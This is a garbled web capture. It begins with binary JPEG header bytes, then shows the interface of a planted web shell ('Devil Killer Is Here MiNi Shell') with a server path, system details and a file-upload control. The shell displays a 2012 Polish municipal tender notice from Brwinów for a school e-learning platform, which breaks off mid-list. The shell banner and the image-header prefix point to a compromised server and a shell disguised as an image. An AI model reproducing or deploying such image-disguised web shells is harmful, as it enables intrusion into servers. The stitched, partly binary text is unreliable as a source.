JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120213/34813-N-2012.html

<p class="kh_header"><b>Brwinów: Opracowanie, uruchomienie na e-learningowej platformie edukacyjnej kursów języka angielskiego, informatyki, matematyki w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych oraz z liceum ogólnokształcącego wraz z wyhostowaniem platformy edukacyjnej i jednostek e-learningowych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym, dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 34813 - 2012; data zamieszczenia: 13.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie, uruchomienie na e-learningowej platformie edukacyjnej kursów języka angielskiego, informatyki, matematyki w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych oraz z liceum ogólnokształcącego wraz z wyhostowaniem platformy edukacyjnej i jednostek e-learningowych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym, dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie, uruchomienie na e-learningowej platformie edukacyjnej kursów języka angielskiego, informatyki, matematyki w ramach zajęć pozaszkolnych wspierających naukę uczniów z dwóch szkół podstawowych, z dwóch szkół gimnazjalnych oraz z liceum ogólnokształcącego wraz z wyhostowaniem platformy edukacyjnej i jednostek e-learningowych w ramach projektu Multimedialni uczniowie - zajęcia pozalekcyjne w systemie blended learningu i tradycyjnym, dofinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Projekt realizowany w ramach umowy nr UDA-POKL.09.01.02-14-079/10-00.

2.  Przedmiot zamówienia obejmuje:
1) Opracowanie zgodnie z opisem w zał. nr 1 do umowy, kursów języka angielskiego, informatyki i matematyki prowadzonych w ramach metody blended learningu wspierających naukę 84 uczniów dwóch szkół podstawowych, dwóch szkół gimnazjalnych oraz liceum ogólnokształcącego leżących na terenie Gminy Brwinów.
2)	 Zaprojektowanie, prowadzenie i wyhostowanie na okres od dnia podpisania umowy dla LO w Brwinowie do 30.04.2013 r. platformy e-learningowej dla 12 uczniów oraz dla ZS nr 2 w Brwinowie i ZS w Otrębusach do 30.06.2013 r. dla 72 uczniów wraz z zasobami i funkcjonalnościami opisanymi poniżej.
3) Udostępnienie platformy w okresie od dnia podpisania umowy dla LO w Brwinowie do 30.04.2013 r. (12 miesięcy) dla 12 uczniów oraz dla ZS nr 2 w Brwinowie i ZS w Otrębusach do 30.06.2013 r. (14 miesięcy) dla 72 uczniów, dla wszystkich użytkowników przez 24 godziny, 7 dni w tygodniu, z wyłączeniem miesięcy lipiec- sierpień 2012 r., okres ferii letnich.
4) Platforma e-learningowa będzie pełnić funkcję informacyjno-szkoleniową oraz funkcję diagnozująco - egzaminującą wiedzę uczniów z zakresu przedmiotów objętych e-learningiem.
5) Opłaty za użytkowanie platformy firmie wnoszone będą w systemie miesięcznym- przez okres trwania projektu, z wyłączeniem miesięcy lipiec- sierpień 2012 r.- okres ferii letnich.
6) Użytą w niniejszej dokumentacji terminologię należy rozumieć zgodnie z przedstawionymi poniżej definicjami:
- Platforma e-learningowa - infrastruktura sprzętowa i programowa tworząca spójną platformę systemową, obejmująca oprogramowanie do prowadzenia nauki na odległość. 
- Pojęcia uczeń, użytkownik  - osoba korzystająca z platformy.
- Pojęcia nauczyciel, osoba prowadząca zajęcia on-line oraz w niniejszym opracowaniu używane są wymiennie.
- Administrator - osoba zajmująca się infrastrukturą techniczną oraz wprowadzaniem zmian parametrów systemu.
- Instrukcja użytkownika - opis czynności i zasad umożliwiających użytkownikom platformy e-learningowej wykorzystywanie wszystkich jej cech funkcjonalnych. Instrukcja winna być sporządzona w języku polskim przy użyciu prostego słownictwa łatwego do przyswojenia a dodatkowo na platformie w witrynie internetowej winna być zamieszczona instrukcja graficzna z elementami zrzutów ekranowych oraz instrukcja video zawierająca zbiór opisów wszystkich czynności możliwych do wykonania przez użytkownika.
- Kurs języka angielskiego, kurs informatyki, kurs matematyki - realizuje uczeń po zalogowaniu się na platformę e-learningową w wybranym bloku szkoleniowym, rozumiany jako technika i metoda szkolenia na odległość, wykorzystujący Internet. Kurs e-learningowy umożliwia użytkownikowi samodzielne wybranie preferowanego tempa wiedzy jej przekazywania oraz jej zaliczenia na podstawie przerobionego przez użytkownika materiału dydaktycznego.
- Jednostka e-learningowa - dział tematyczny z danego przedmiotu. Wskazane jest, aby projekt jednostki e-learningowej uwzględniał podział treści na niewielkie części, możliwe do pokazania w sposób czytelny na monitorze komputera użytkownika. W przypadku prezentacji materiału w formie tekstowej należy umożliwić uczestnikom szkolenia możliwość wydruku materiałów.
3. Schemat ogólny przykładowej jednostki e-learningowej:
Strona tytułowa.
A. Informacje wstępne. 
1. Cele (tematu, działu tematycznego, itp.). 
B. Treść jednostki (Materiał do przyswojenia). 
C. Zadania/ćwiczenia.
D. Quizy sprawdzające wiedzę.
E. Materiały dodatkowe, np. krzyżówki, mapy, itp.
Przedstawiona powyżej struktura jednostki e-learningowej może ulegać modyfikacjom w zależności od specyfiki bloku szkoleniowego oraz rodzaju prezentowanych treści. 
4. Blok szkoleniowy - zestaw zasobów cyfrowych udostępnionych na platformie e-learningowej wraz z uzupełniającymi działaniami szkoleniowymi. Zajęcia będą miały charakter wyrównujący, jak również ich celem będzie rozwijanie zainteresowań uczniów językiem lub przedmiotem.

5. Poziomy wiedzy w ramach Blended learning:
1) Kurs języka angielskiego realizowany będzie na trzech poziomach: szkoły podstawowej (kl. IV-VI), gimnazjum (kl. I-II) i liceum ogólnokształcącego (kl. I-II), korzystać z niego będzie 5 grup 12 osobowych. Kursy powinny być dostosowane do podręczników/programu nauczania w danej placówce, program kursów spójny z istniejącym realizowanym programem. 
2) Kurs informatyki realizowany będzie na poziomie klasy IV-VI szkoły podstawowej, korzystać z niego będzie 12 osobowa grupa uczniów. E-learningowy kurs informatyki będzie prowadzony w grupie dzieci, na poziomie klas IV-VI Szkoły podstawowej.
3) Kurs matematyki realizowany będzie na poziomie I-II klasy gimnazjum, korzystać z niego będzie 12 osobowa grupa uczniów. E-learningowy kurs matematyki będzie prowadzony w grupie dzieci, na poziomie I-II klasa gimnazjum. 
6. Jednostka e-learningowa składa się z 3 części:
1) część dydaktyczna- teoretyczna materiału nauczania w formie tzw. książki.
Książka- materiały edukacyjne, które mogą przybierać dowolną formę multimedialną, na jaką pozwalają technologie internetowe, w szczególności: tekst, grafika, obrazy, animacja, wideo, audio, pliki do pobrania.
2) część ćwiczeniowa- zadania z rozwiązaniami.
Zadania- każde zadanie powinno zawierać komentarz lub podpowiedź do sposobu jego rozwiązania. Konstrukcja zadania powinna być ukierunkowana na jednoznaczną odpowiedź. Zadania mogą być określane wraz z terminem ich rozwiązania. Po przesłaniu rozwiązania uczeń otrzymuje za pomocą poczty e-mail informację zwrotną dotyczącą poprawności rozwiązania zadania.
3) część diagnostyczna- quiz sprawdzający poziom opanowania materiału nauczania.
Quiz- quizy są automatycznie oceniane. Do quizów można podchodzić wielokrotnie. Pytania i odpowiedzi do quizów mogą być wymieszane. Do quizów można załączać grafiki i kod HTML. Możliwość edytowania pytań: wielokrotnego wyboru, typu prawda-fałsz lub przyporządkuj odpowiedź; wykładowca on-line może rozszerzać bazę pytań, aby móc ich używać wielokrotnie.
7. Kurs języka angielskiego metodą blended learningu obejmuje łącznie 120 godzin x 5 grup ( grupa liczy 12 osób) zajęć na platformie e-learningowej dla 60 uczniów - wyrównujących dysproporcje edukacyjnych lub poszerzających wiedzę. W ramach blended learningu osoba prowadząca zajęcia z języka angielskiego będzie sprawowała opiekę nad uczestnikami, podczas ich pracy na platformie e-learningowej. Osoby prowadzące zajęcia (nauczyciele) w ramach blended learningu będą korzystały z platformy łącznie  to 600 godzin = 120 godzin x 5 grup ( grupa liczy 12 osób) zajęć na platformie e-learningowej dla 60 uczniów. Będą miały możliwość tworzenia raportów z aktywności na platformie dla danego ucznia LO w Brwinowie w okresie od marca 2012 r.- 30.04.2013 r. z wyłączeniem okresu ferii letnich  i dla danego ucznia ZS nr 2 w Brwinowie i ZS w Otrębusach w okresie od marca 2012 r.- 30.06.2013 r. z wyłączeniem okresu ferii letnich. Wszystkie jednostki e-learningowe winny być dostępne na platformie e-learningowej do zakończenia projektu tj. do 31.07.2013 r.  od dnia podpisania umowy.
8. Wymagania wobec jednostek e-learningowych kursów:
Wykonawca musi dysponować zasobem jednostek e-learningowych, spełniając co najmniej poniższe warunki:
a) jednostki e-learningowe powinny mieć strukturę przedstawioną powyżej w opisie kursów o objętości dla kursu języka angielskiego średnio 40 jednostek e-learningowych, dla kursu informatyki średnio 20 jednostek e-learningowych i dla kursu matematyki średnio 30 jednostek e-learningowych;
b) każda z jednostek e-learningowych musi być zrealizowana w języku polskim, poza jednostkami z języka angielskiego, w których jednak polecenia do zadań muszą być w języku polskim;
c) przynajmniej 30% wszystkich ekranów łącznie jednostek e-learningowych musi zawierać głos lektora;
d) przynajmniej 30% wszystkich ekranów łącznie jednostek e-learningowych musi zawierać interakcje, bądź animacje;
e) tematy i treści jednostek e-learningowych powinny być: skonsultowane z osobami prowadzącymi zajęcia, dostosowane do poziomu wiedzy uczestników e-lerningowych kursów oraz zgodne z zagadnieniami z Rozporządzenia Ministra Edukacji Narodowej z dnia 23 grudnia 2008r. w sprawie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół (rozporządzenie zostało opublikowane w Dzienniku Ustaw z dnia 15 stycznia 2009 r. Nr 4, poz. 17); 
f) dokładny zakres materiału kursów zostanie przedstawiony po dokonaniu rekrutacji i utworzeniu grup. 
9. Każdy uczestnik kursu języka angielskiego, który ukończony kurs na platformie e-learningowej otrzyma Certyfikat ukończenia kursu e-learningowego języka angielskiego w formie elektronicznej przygotowanej do wydruku; automatycznie generowany i wysyłany przez system na adres e-mail danego zalogowanego do systemu użytkownika. Za pozytywnie ukończony kurs szkoleniowy uznaje się zaliczenie 60 % oferowanych jednostek e-learningowych w ramach wybranego przedmiotu. 
10. Wykonawca założy docelowo około 89 kont na platformie e-lerningowej (84 uczniów i 5 osób prowadzących zajęcia) wraz z jednorazowymi hasłami dostępu. Loginy i hasła dostępowe do kont zostaną udostępnione Zamawiającemu. Korzystając z loginu i jednorazowego hasła dostępu użytkownik podczas pierwszego logowania zostanie poproszony o zmianę hasła.
11. Wykonawca musi dysponować co najmniej jednym moderatorem forum dyskusyjnego dla każdego ze wskazanych przedmiotów nauczania określonych w niniejszym opisie przedmiotu zamówienia.
12. Wykonawca w ramach realizacji zamówienia zapewni zaplecze sprzętowe, łącza internetowe, hosting, utrzymanie i płynne działanie kompleksowej usługi platformy e-learningowej przez okres funkcjonowania projektu. Wykonawca dysponuje osobami posiadającymi kwalifikacje i doświadczenie niezbędne do należytego wykonania tego obowiązku.
13. Wykonawca wyrazi zgodę na zwiększenie liczby użytkowników w granicach do 10 % w szczególności w przypadku konieczności wprowadzenia nowych użytkowników przed coroczną ich aktualizacją. Zwiększenie liczby uczestników do 10% nie uprawnia Wykonawcy do zwiększonego wynagrodzenia, a ewentualne koszty z tytułu zwiększenia liczby użytkowników winien on uwzględnić w cenie oferty.
14. Sposób realizacji przedmiotu zamówienia określony został we wzorze umowy stanowiącym załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 50% wartości zamówienia podstawowego, polegające na powtórzeniu tego samego rodzaju zamówień. Na zamówienia uzupełniające zostanie zawarta odrębna umowa na podstawie art.67 ust.1 pkt.6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4, 80.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują co najmniej 2 usługi odpowiadające swoim rodzajem usługom związanym z opracowaniem, uruchomieniem i prowadzeniem na e-learningowej platformie edukacyjnej kursów szkoleniowych wraz z wyhostowaniem platformy edukacyjnej i jednostek e-learningowych, potwierdzone dokumentami o należytym wykonaniu;

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone  dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) załącznik nr 2- oświadczenie o spełnianiu warunków udziału w postępowaniu;
2) załącznik nr 3 - wykaz usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały należycie wykonane;
3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany podmiotu trzeciego (podwykonawcy), na którego zasobach Wykonawca potwierdził spełnianie warunków udziału w postępowaniu o udzielenie niniejszego zamówienia publicznego, a nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 
3)	zmiany podwykonawców lub zakresu usług wykonywanych przez podwykonawców zgłoszonych przez Wykonawcę,
4)	w przypadku konieczności zmiany osoby wykonującej obowiązki moderatora forum dyskusyjnego dla każdego ze wskazanych przedmiotów kursu, za zgodą Zamawiającego,
5)	zmian w zakresie liczebności poszczególnych grup szkoleniowych,
6)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ,
7)	zmiana okresu realizacji umowy, o którym mowa w § 2 umowy, jest możliwa wyłącznie za zgodą obu stron umowy;
8)	w przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
